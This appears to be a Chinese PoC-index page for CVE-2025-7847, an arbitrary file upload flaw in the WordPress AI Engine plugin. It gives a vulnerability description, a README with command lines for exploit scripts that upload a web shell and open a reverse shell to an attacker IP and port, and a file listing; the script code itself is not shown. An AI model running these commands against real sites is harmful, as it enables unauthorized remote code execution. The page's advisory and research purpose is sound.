关联漏洞
标题:
WordPress plugin AI Engine 代码问题漏洞
(CVE-2025-7847)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin AI Engine 2.9.3和2.9.4版本存在代码问题漏洞,该漏洞源于rest_simpleFileUpload函数未验证文件类型,可能导致任意文件上传和远程代码执行。
描述
Wordpress Plugin AI Engine 2.9.3 - 2.9.4 Proof Of Concept
介绍
# CVE-2025-7847 Wordpress Plugin Authenticated Subscriber Arbitrary File Upload POC
Wordpress Plugin AI Engine 2.9.3 - 2.9.4 Proof Of Concept
Please note that this vulnerability can only be exploited if the “Public API” option is enabled, which is disabled by default, and no Bearer Token is configured, nor is custom authentication added and used to protect the API.
# Automate Version
```
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444
```
# Web Shell Upload Only
```
python3 exploit.py \
--url "http://target.com/" \
--username "Admin" \
--password "L87*********C4u" \
--file shell.php
```
文件快照
[4.0K] /data/pocs/9ae39d8a8d3fdeafbdb2b0252378296fcc1aea49
├── [4.9K] exploit-auto.py
├── [1.9K] exploit-manual.py
├── [4.0K] exploit.py
├── [ 34K] LICENSE
├── [ 846] README.md
├── [ 73] reverse.php
└── [ 31] shell.php
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。